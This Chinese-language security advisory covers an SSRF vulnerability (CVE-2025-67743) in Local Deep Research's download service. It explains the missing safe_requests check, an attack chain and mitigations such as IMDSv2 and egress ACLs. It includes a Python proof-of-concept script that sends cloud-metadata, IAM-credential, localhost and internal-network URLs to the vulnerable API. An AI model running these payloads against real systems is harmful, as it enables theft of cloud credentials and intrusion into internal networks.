CVE-2025-67743 Local Deep Research SSRF服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-67743

漏洞类型

SSRF (服务器端请求伪造)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Local Deep Research

漏洞概述

Local Deep Research是一款AI驱动的深度研究助手。在1.3.0至1.3.9之前的版本中，download_service.py模块存在严重的安全漏洞。该模块在处理下载请求时直接使用Python标准库的requests.get()方法发起HTTP请求，而绕过了应用程序自带的SSRF防护机制safe_requests.py。这一设计缺陷使得攻击者可以通过API提交恶意构造的URL，强制服务器向内部网络资源发起请求。由于该应用通常部署在云环境中，漏洞可能导致攻击者访问云服务商的元数据端点（如AWS EC2元数据服务、GCP元数据服务、Azure实例元数据服务），从而获取敏感凭证、IAM角色信息、访问密钥等关键数据。此外，攻击者还能利用此漏洞对内网进行侦察，探测内部服务开放状态。该漏洞的CVSS评分为6.3，属于中等严重程度，但实际危害取决于具体部署环境。

技术细节

漏洞根源在于download_service.py模块的实现逻辑。该模块负责处理用户请求的URL下载功能，预期应该使用safe_requests.py中实现的SSRF防护函数，该函数包含对内部IP段（如10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）、localhost、链路本地地址等敏感地址范围的过滤检查。然而在实际代码中，download_service.py直接导入了requests库并调用requests.get()方法，完全跳过了安全检查层。攻击者只需构造包含内网地址或云元数据端点的请求即可触发漏洞。例如，向AWS EC2元数据服务发送请求http://169.254.169.254/latest/meta-data/可获取实例元数据，若实例绑定了IAM角色则可进一步获取临时访问凭证。攻击者可通过API接口（如/research/download或类似端点）提交恶意URL，利用服务器的网络权限访问受保护资源。由于请求由服务器发起，攻击者可以绕过传统的网络边界限制，直接探测内网服务状态。

攻击链分析

STEP 1

1

攻击者识别目标服务器运行存在漏洞的Local Deep Research版本（1.3.0-1.3.8）

STEP 2

2

攻击者发现download_service.py模块的API端点，该端点接受URL参数

STEP 3

3

攻击者构造恶意请求，将URL指向云元数据端点（如AWS 169.254.169.254）或内网地址

STEP 4

4

服务器收到请求后，download_service.py直接使用requests.get()发起请求，绕过SSRF防护

STEP 5

5

请求被转发到目标地址，服务器响应被返回给攻击者，敏感信息泄露

STEP 6

6

若获取到云服务凭证，攻击者可进一步横向移动，访问S3存储、数据库等云资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67743 SSRF PoC
# Target: Local Deep Research <= 1.3.8
# Attack: Exploit SSRF to access AWS EC2 metadata

import requests
import json

# Target endpoint (adjust based on actual API)
TARGET_URL = "http://target-server:8000/api/research/download"

# Payload to exploit SSRF - Access AWS EC2 metadata service
ssrf_payloads = [
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://169.254.169.254/latest/meta-data/instance-id",
    "http://169.254.169.254/latest/user-data/",
    "http://localhost:22/",
    "http://127.0.0.1:6379/",
    "http://10.0.0.1:8080/admin"
]

def exploit_ssrf(target_url, payload):
    """
    Send malicious URL to download service
    The vulnerable code uses requests.get() directly
    instead of safe_requests.get() with SSRF protection
    """
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    # Malicious request payload
    data = {
        "url": payload,
        "task_id": "test_123"
    }
    
    try:
        response = requests.post(target_url, json=data, headers=headers, timeout=10)
        print(f"[*] Payload: {payload}")
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
        print("-" * 50)
        return response.text
    except Exception as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    print("CVE-2025-67743 SSRF Exploitation Test")
    print("=" * 50)
    
    for payload in ssrf_payloads:
        result = exploit_ssrf(TARGET_URL, payload)
        
    # Check if sensitive data was exfiltrated
    print("\n[!] If credentials found, attacker can:")
    print("    1. Use AWS keys for lateral movement")
    print("    2. Access internal services")
    print("    3. Escalate privileges in cloud environment")

影响范围

Local Deep Research >= 1.3.0

Local Deep Research < 1.3.9

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 在网络边界配置ACL，阻止服务器对169.254.0.0/16（云元数据IP段）和RFC1918私有地址段的出站连接；2) 对AWS环境启用IMDSv2，要求元数据访问必须携带Token；3) 限制应用的网络访问权限，使用安全组规则最小化暴露面；4) 监控异常的外向连接请求，特别是对内网地址的访问；5) 考虑在测试环境中验证漏洞影响范围。